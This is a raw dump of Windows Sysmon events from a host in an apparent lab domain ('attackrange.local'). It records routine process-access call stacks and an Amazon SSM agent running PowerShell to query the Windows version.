13:09:45.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.213{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.213{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.213{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.213{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.213{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.213{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.213{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.212{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.212{08A6967A-4298-6000-3000-000000009A01}23763620C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000001443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000001442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.211{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.209{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.208{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.207{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 